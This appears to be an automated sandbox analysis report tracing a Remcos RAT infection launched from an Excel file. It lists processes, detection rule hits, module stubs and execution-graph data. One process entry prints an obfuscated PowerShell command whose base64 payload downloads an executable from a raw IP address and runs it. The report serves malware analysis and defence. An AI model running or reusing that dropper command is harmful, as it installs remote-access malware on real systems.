                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline"
                Imagebase:0x13f4d0000
                File size:2'758'280 bytes
                MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                Target ID:9
                Start time:03:30:05
                Start date:26/07/2024
                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC41B.tmp" "c:\Users\user\AppData\Local\Temp\ofvwqfjd\CSC42CCF8E8871B428699CAD148D9BC26FF.TMP"
                Imagebase:0x13fc30000
                File size:52'744 bytes
                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                Target ID:11
                Start time:03:30:12
                Start date:26/07/2024
                Path:C:\Users\user\AppData\Roaming\winiti.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\AppData\Roaming\winiti.exe"
                Imagebase:0x13fdd0000
                File size:2'673'152 bytes
                MD5 hash:4FB3E6E7B8F9C12CD2D5E161F7B94760
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                Reputation:low
                Has exited:true

                Target ID:13
                Start time:03:30:13
                Start date:26/07/2024
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                Imagebase:0x1120000
                File size:41'112 bytes
                MD5 hash:AF862061889F5B9B956E9469DCDAE773
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.843116352.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation:moderate
                Has exited:false

                Target ID:16
                Start time:03:30:20
                Start date:26/07/2024
                Path:C:\Windows\System32\mshta.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\mshta.exe -Embedding
                Imagebase:0x13f540000
                File size:13'824 bytes
                MD5 hash:95828D670CFD3B16EE188168E083C3C5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:17
                Start time:03:30:22
                Start date:26/07/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
                Imagebase:0x4a8f0000
                File size:345'088 bytes
                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:19
                Start time:03:30:22
                Start date:26/07/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
                Imagebase:0x13f350000
                File size:443'392 bytes
                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                Target ID:20
                Start time:03:30:23
                Start date:26/07/2024
                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline"
                Imagebase:0x13fa10000
                File size:2'758'280 bytes
                MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:21
                Start time:03:30:24
                Start date:26/07/2024
                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9F.tmp" "c:\Users\user\AppData\Local\Temp\ge3s1wmx\CSCB36078EA61014130AC1261969F8319D.TMP"
                Imagebase:0x13ff50000
                File size:52'744 bytes
                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:22
                Start time:03:30:28
                Start date:26/07/2024
                Path:C:\Users\user\AppData\Roaming\winiti.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\AppData\Roaming\winiti.exe"
                Imagebase:0x13f5f0000
                File size:2'673'152 bytes
                MD5 hash:4FB3E6E7B8F9C12CD2D5E161F7B94760
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                Has exited:true

                Target ID:24
                Start time:03:30:28
                Start date:26/07/2024
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                Wow64 process (32bit):
                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                Imagebase:
                File size:261'688 bytes
                MD5 hash:C1BE61F3DE532751D6C1A35B851B0367
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:false

                Target ID:25
                Start time:03:30:29
                Start date:26/07/2024
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                Imagebase:0xcb0000
                File size:42'056 bytes
                MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.484511050.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Has exited:true

Module: Sheet1

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Module: Sheet2

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Module: Sheet3

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Module: ThisWorkbook

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                  Memory Dump Source
                  • Source File: 00000004.00000003.422784556.00000000031B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_3_31b0000_mshta.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                  • Instruction ID: 300254f3231993d467f09c06316af5edb6eaa4338009a099092a1367209101aa
                  • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                  • Instruction Fuzzy Hash:

                  Execution Graph

                  Execution Coverage:4.4%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:0%
                  Total number of Nodes:3
                  Total number of Limit Nodes:0
[Execution graph, rendered as an image in the original report: 7fe899f7ae1 -> 7fe899f7af1 (URLDownloadToFileW) -> 7fe899f7c00]

                  Control-flow Graph

[Control-flow graph, rendered as an image in the original report: basic blocks 7fe899f7018-7fe899f7c23; the block at 7fe899f7bbb-7fe899f7bfe calls URLDownloadToFileW]
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.456821030.000007FE899F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_7fe899f0000_powershell.jbxd
                  Similarity
                  • API ID: DownloadFile
                  • String ID:
                  • API String ID: 1407266417-0
                  • Opcode ID: 57e0ea8ff209ae2a786c045d17250b47d06dcbfc7a8eb966348c235fdc8f49ec
                  • Instruction ID: 71c211064a91aa74a8ce5071b02526f3c7f91a7aba0f5081aaa2ac5c42da5f97
                  • Opcode Fuzzy Hash: 57e0ea8ff209ae2a786c045d17250b47d06dcbfc7a8eb966348c235fdc8f49ec
                  • Instruction Fuzzy Hash: 7A319031918A5C8FDB58EF5CD8857A9B7E1FB69321F00822ED04DD3651CB70A8058B81

                  Control-flow Graph

                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.456906198.000007FE89AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_7fe89ac0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 8h<$8h<$8h<$8h<
                  • API String ID: 0-520171196
                  • Opcode ID: 49f98a1f7dce5f85b5316ee0b29c309ef960a693195c76156441a5023d5f5c58
                  • Instruction ID: 312008ed4d1e6f180959b670b8e349af900ba608e972ed9a065919a83deddd8a
                  • Opcode Fuzzy Hash: 49f98a1f7dce5f85b5316ee0b29c309ef960a693195c76156441a5023d5f5c58
                  • Instruction Fuzzy Hash: 24A1D220A0D7CA0FE747D73C58646657FE1EF47258B2900EBD58ECB2A3D9189C5AC361

                  Control-flow Graph

                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.456906198.000007FE89AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_7fe89ac0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: V
                  • API String ID: 0-1342839628
                  • Opcode ID: 3b88d5af0196fb849c45ae73b54ea9d02cc47a403d9a86902f1aa9840958b613
                  • Instruction ID: 7c257f1dc6a685d078b1f939684ef1405139d1db8acf94d9630697452c5171f3
                  • Opcode Fuzzy Hash: 3b88d5af0196fb849c45ae73b54ea9d02cc47a403d9a86902f1aa9840958b613
                  • Instruction Fuzzy Hash: 62D1273080E7C91FD357973898146B67FA4EF57264F0911EBE48DCB0A3D618AD1AC3A2

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.456821030.000007FE899F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_7fe899f0000_powershell.jbxd
                  Similarity
                  • API ID: DownloadFile
                  • String ID:
                  • API String ID: 1407266417-0
                  • Opcode ID: 10e21d837cd752a3c70500a2552246aa0a095d5d503b4ef883d3900a5d202389
                  • Instruction ID: 19eef98bea44a3bc7bf06c9a8cecebbf9ff3d9e28e4fd5846833f4787cdac5ee
                  • Opcode Fuzzy Hash: 10e21d837cd752a3c70500a2552246aa0a095d5d503b4ef883d3900a5d202389
                  • Instruction Fuzzy Hash: 4341F57091DB889FDB1ADB58D8447FABBF0FB56321F04426FD089D3562CB64A806C781

                  Control-flow Graph

                  Memory Dump Source
                  • Source File: 00000007.00000002.456906198.000007FE89AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_7fe89ac0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cc6fd2091e8dae0d3d7aeef86f1d7e072752b5b4f45e245964049c0a9035c6b5
                  • Instruction ID: 35b94f3ff96226d02deb09ed360ebadad33592b546abc5ddf054c99cfa6942c5
                  • Opcode Fuzzy Hash: cc6fd2091e8dae0d3d7aeef86f1d7e072752b5b4f45e245964049c0a9035c6b5
                  • Instruction Fuzzy Hash: C422F63090CB894FD79ADB2C94506B97BE2FF9A744F2400EED44ECB2A3DA24AC55C751

                  Control-flow Graph

                  Memory Dump Source
                  • Source File: 00000007.00000002.456906198.000007FE89AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_7fe89ac0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4c7fe621b8e0522053fba86d8a3f78ba9b42cd845e76596065581cd5fddfbfdf
                  • Instruction ID: 3b2d24a1f550a87ee9fd61e5873df2223f648a134e97f1cb71219df07a3a3202
                  • Opcode Fuzzy Hash: 4c7fe621b8e0522053fba86d8a3f78ba9b42cd845e76596065581cd5fddfbfdf
                  • Instruction Fuzzy Hash: 5BC1353090DBCA4FE74AE72854546BA7FE1EF86758F1501EBD48ECB1A3C618AC16C361
                  Memory Dump Source
                  • Source File: 00000007.00000002.456906198.000007FE89AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_7fe89ac0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 62c829c2e24d71071b5207ad50ae66f3b4de56fe513071356b266c2cddd6a4bd
                  • Instruction ID: c36e8fb017852f120f41f41d1d90226404cec8ebece43208bf621e72c3e6179e
                  • Opcode Fuzzy Hash: 62c829c2e24d71071b5207ad50ae66f3b4de56fe513071356b266c2cddd6a4bd
                  • Instruction Fuzzy Hash: 6BA1052090E7CD0FD747A77898146A67FF1EF4B258F1A01EBD48DCB1A3D618991AC362

                  Execution Graph

                  Execution Coverage: 6.6%
                  Dynamic/Decrypted Code Coverage: 0%
                  Signature Coverage: 4.4%
                  Total number of Nodes: 918
                  Total number of Limit Nodes: 48
16369->16372 16370->16359 16376 13fe104d0 16371->16376 16372->16371 16375 13fdde020 4 API calls 16375->16370 16377 13fe10595 16376->16377 16378 13fe10509 EnterCriticalSection 16376->16378 16379 13fdfda29 16377->16379 16380 13fde2930 3 API calls 16377->16380 16381 13fe10529 LeaveCriticalSection 16378->16381 16379->16370 16379->16375 16382 13fe105c6 16380->16382 16381->16377 16382->16379 16384 13fe105d7 EnterCriticalSection 16382->16384 16385 13fe105f6 16384->16385 16386 13fe105fd LeaveCriticalSection 16384->16386 16385->16386 16386->16379 16391 13fdda7a1 16392 13fdda774 16391->16392 16393 13fdda7b3 16391->16393 16398 13fde7420 16393->16398 16402 13fde75d1 16393->16402 16406 13fde744e 16393->16406 16394 13fdda7d4 16399 13fde7592 16398->16399 16400 13fde7499 16398->16400 16399->16400 16414 13fde9e40 16399->16414 16400->16394 16403 13fde75b0 16402->16403 16403->16402 16404 13fde7499 16403->16404 16405 13fde9e40 3 API calls 16403->16405 16404->16394 16405->16404 16407 13fde748b 16406->16407 16408 13fde74b5 16406->16408 16410 13fde7499 16407->16410 16411 13fde7494 DebugBreak 16407->16411 16424 13fdecf30 16408->16424 16410->16394 16411->16410 16412 13fde74d8 16412->16410 16413 13fde9e40 3 API calls 16412->16413 16413->16410 16416 13fde9e76 16414->16416 16419 13fde9eaf 16414->16419 16415 13fde9e89 SwitchToThread 16415->16416 16416->16415 16416->16419 16421 13fde28e0 16416->16421 16418 13fde9f85 ISource 16418->16400 16419->16418 16420 13fde9f80 DebugBreak 16419->16420 16420->16418 16422 13fde28ed 16421->16422 16423 13fde28e4 SleepEx 16421->16423 16422->16416 16423->16422 16435 13fdecf5f 16424->16435 16425 13fdf3670 39 API calls 16425->16435 16426 13fe04b90 GetTickCount64 16426->16435 16427 13fded019 SwitchToThread 16427->16435 16430 13fded13b 16430->16412 16432 13fded045 SwitchToThread 16432->16435 16433 13fde28e0 SleepEx 16433->16435 16434 13fe10880 WaitForSingleObject 16434->16435 16435->16425 16435->16426 16435->16427 16435->16430 16435->16432 16435->16433 16435->16434 
16436 13fded00d SwitchToThread 16435->16436 16437 13fdedbe0 16435->16437 16457 13fe106c0 16435->16457 16471 13fded660 16435->16471 16436->16435 16438 13fdeddd2 16437->16438 16439 13fdedc1c 16437->16439 16442 13fe0ea80 6 API calls 16438->16442 16440 13fdedc8d 16439->16440 16441 13fdeddd7 16439->16441 16444 13fdedc9c SwitchToThread 16440->16444 16441->16438 16486 13fde7080 16441->16486 16442->16438 16448 13fdedcaa 16444->16448 16445 13fdedd51 SwitchToThread 16445->16448 16448->16438 16448->16445 16449 13fdedd7d SwitchToThread 16448->16449 16450 13fde28e0 SleepEx 16448->16450 16455 13fdedd45 SwitchToThread 16448->16455 16482 13fe10880 16448->16482 16449->16448 16450->16448 16455->16448 16458 13fe10869 16457->16458 16459 13fe106dd 16457->16459 16458->16435 16460 13fde2080 10 API calls 16459->16460 16461 13fe10704 16460->16461 16462 13fe10857 16461->16462 16463 13fde7080 WaitForSingleObject 16461->16463 16462->16435 16464 13fe1073d 16463->16464 16465 13fe10840 16464->16465 16466 13fe107c9 SwitchToThread 16464->16466 16467 13fe107f5 SwitchToThread 16464->16467 16468 13fde28e0 SleepEx 16464->16468 16469 13fe10880 WaitForSingleObject 16464->16469 16470 13fe107bd SwitchToThread 16464->16470 16465->16435 16466->16464 16467->16464 16468->16464 16469->16464 16470->16464 16472 13fded69c 16471->16472 16473 13fded80b 16471->16473 16472->16473 16474 13fde28e0 SleepEx 16472->16474 16492 13fe0cbb0 16473->16492 16476 13fded6df 16474->16476 16476->16473 16477 13fded78a SwitchToThread 16476->16477 16478 13fded7b6 SwitchToThread 16476->16478 16479 13fde28e0 SleepEx 16476->16479 16480 13fe10880 WaitForSingleObject 16476->16480 16481 13fded77e SwitchToThread 16476->16481 16477->16476 16478->16476 16479->16476 16480->16476 16481->16476 16484 13fe10896 16482->16484 16483 13fe108cd 16483->16448 16484->16483 16490 13fde2c40 WaitForSingleObject 16484->16490 16487 13fde7098 16486->16487 16491 13fde2c40 WaitForSingleObject 16487->16491 16493 13fe0cbee 16492->16493 16495 13fe0ce87 _swprintf_c_l 
16493->16495 16496 13fdfd200 16493->16496 16495->16473 16506 13fdfd0a0 16496->16506 16498 13fdfd2f6 DebugBreak 16500 13fdfd305 16498->16500 16499 13fdfd211 16499->16498 16501 13fdfd2b9 DebugBreak 16499->16501 16502 13fdfd2d6 DebugBreak 16499->16502 16503 13fdfd328 16499->16503 16504 13fdfd2ed 16499->16504 16500->16503 16505 13fdfd319 DebugBreak 16500->16505 16501->16499 16502->16499 16503->16493 16504->16498 16504->16500 16505->16503 16507 13fdfd0c2 16506->16507 16508 13fdfd115 16507->16508 16510 13fdfd130 16507->16510 16517 13fded210 16508->16517 16511 13fdfe7a0 2 API calls 16510->16511 16515 13fdfd152 16511->16515 16512 13fdfd1e5 16512->16499 16513 13fdfd128 16513->16512 16524 13fdff550 16513->16524 16515->16513 16516 13fdfd1a2 EnterCriticalSection LeaveCriticalSection 16515->16516 16516->16513 16518 13fded239 16517->16518 16518->16518 16521 13fded367 16518->16521 16543 13fe04c30 16518->16543 16520 13fded4ef 16520->16513 16521->16520 16522 13fe01660 9 API calls 16521->16522 16523 13fded516 16522->16523 16523->16513 16525 13fdff569 16524->16525 16526 13fdff605 16524->16526 16547 13fdf3f10 16525->16547 16526->16512 16528 13fdff5eb 16529 13fdf6690 5 API calls 16528->16529 16531 13fdff5f8 16529->16531 16531->16512 16532 13fdff58c 16533 13fdff5ce 16532->16533 16534 13fdff591 16532->16534 16535 13fdf6690 5 API calls 16533->16535 16536 13fdff596 16534->16536 16537 13fdff5b1 16534->16537 16540 13fdff5de 16535->16540 16553 13fdf6690 16536->16553 16539 13fdf6690 5 API calls 16537->16539 16542 13fdff5c1 16539->16542 16540->16512 16541 13fdff5a4 16541->16512 16542->16512 16544 13fe04c94 16543->16544 16546 13fe04c49 16543->16546 16544->16521 16545 13fdffae0 18 API calls 16545->16546 16546->16544 16546->16545 16548 13fdf3fd4 16547->16548 16549 13fdf3f50 16547->16549 16548->16526 16548->16528 16548->16532 16549->16548 16561 13fdf3e10 16549->16561 16552 13fdf3e10 7 API calls 16552->16548 16554 13fdf66c7 16553->16554 16556 13fdf66e9 _swprintf_c_l 16554->16556 16571 13fe10630 
16554->16571 16557 13fdf67d0 16556->16557 16578 13fde29c0 VirtualFree 16556->16578 16557->16541 16559 13fdf6795 16559->16557 16560 13fdf67a3 EnterCriticalSection LeaveCriticalSection 16559->16560 16560->16557 16562 13fdf3e53 EnterCriticalSection 16561->16562 16563 13fdf3ea1 16561->16563 16564 13fdf3e70 16562->16564 16565 13fdf3e7d LeaveCriticalSection 16562->16565 16566 13fde2930 3 API calls 16563->16566 16564->16565 16567 13fdf3ee1 LeaveCriticalSection 16564->16567 16565->16563 16568 13fdf3eb2 16566->16568 16569 13fdf3eed 16567->16569 16568->16569 16570 13fdf3ec0 EnterCriticalSection 16568->16570 16569->16548 16569->16552 16570->16567 16579 13fde29c0 VirtualFree 16571->16579 16573 13fe1064a 16574 13fe10694 16573->16574 16575 13fe1065b EnterCriticalSection 16573->16575 16574->16556 16576 13fe10685 LeaveCriticalSection 16575->16576 16577 13fe1067e 16575->16577 16576->16574 16577->16576 16578->16559 16579->16573 16387 13fe00750 16388 13fe0078d 16387->16388 16390 13fe007b7 16387->16390 16389 13fde2080 10 API calls 16388->16389 16389->16390 16580 13fde8602 16581 13fde8608 16580->16581 16604 13fdf9420 16581->16604 16584 13fde8644 16608 13fde2880 QueryPerformanceCounter 16584->16608 16587 13fde8662 16609 13fdda4d0 16587->16609 16589 13fde86c5 16596 13fde89d0 16589->16596 16601 13fde8954 16589->16601 16646 13fde2880 QueryPerformanceCounter 16589->16646 16591 13fde87a5 16591->16589 16625 13fdfa150 16591->16625 16594 13fde87ea 16594->16589 16595 13fdfd950 11 API calls 16594->16595 16595->16589 16597 13fdf9420 SwitchToThread 16596->16597 16599 13fde89db 16597->16599 16603 13fde89fe 16599->16603 16655 13fde28d0 SetEvent 16599->16655 16647 13fdda170 16601->16647 16605 13fde8626 16604->16605 16606 13fdf943f 16604->16606 16605->16584 16619 13fde28c0 ResetEvent 16605->16619 16606->16605 16607 13fdf9481 SwitchToThread 16606->16607 16607->16606 16608->16587 16610 13fdda4e5 16609->16610 16613 13fdda548 16610->16613 16664 13fddae00 EventEnabled 16610->16664 16612 13fdda51f 
16612->16613 16665 13fdda690 EventWrite 16612->16665 16656 13fdd5140 16613->16656 16617 13fdda59c 16617->16589 16617->16591 16620 13fdf9650 16617->16620 16624 13fdf9670 16620->16624 16621 13fdfd950 11 API calls 16621->16624 16622 13fdf96da 16622->16591 16623 13fdfd200 38 API calls 16623->16624 16624->16621 16624->16622 16624->16623 16629 13fdfa165 16625->16629 16626 13fdfa24d 16627 13fded210 24 API calls 16626->16627 16632 13fdfa25f 16627->16632 16628 13fdfa264 16630 13fdfe7a0 2 API calls 16628->16630 16629->16626 16629->16628 16643 13fdfa169 16629->16643 16631 13fdfa28a 16630->16631 16631->16632 16634 13fdfa2a1 EnterCriticalSection LeaveCriticalSection 16631->16634 16633 13fdf3f10 7 API calls 16632->16633 16639 13fdfa300 16632->16639 16632->16643 16635 13fdfa2e6 16633->16635 16634->16632 16637 13fdfa2ea 16635->16637 16635->16639 16636 13fdfa3a8 DebugBreak 16638 13fdfa3b7 16636->16638 16640 13fdf6690 5 API calls 16637->16640 16638->16643 16645 13fdfa3cb DebugBreak 16638->16645 16639->16636 16641 13fdfa36b DebugBreak 16639->16641 16642 13fdfa388 DebugBreak 16639->16642 16644 13fdfa39f 16639->16644 16640->16643 16641->16639 16642->16639 16643->16594 16644->16636 16644->16638 16645->16643 16646->16601 16648 13fdda17d 16647->16648 16652 13fdda1af 16647->16652 16683 13fddae00 EventEnabled 16648->16683 16650 13fdda190 16650->16652 16684 13fdda640 EventWrite 16650->16684 16653 13fdda1fe 16652->16653 16687 13fddae00 EventEnabled 16652->16687 16653->16596 16657 13fdd517f 16656->16657 16658 13fdd51a4 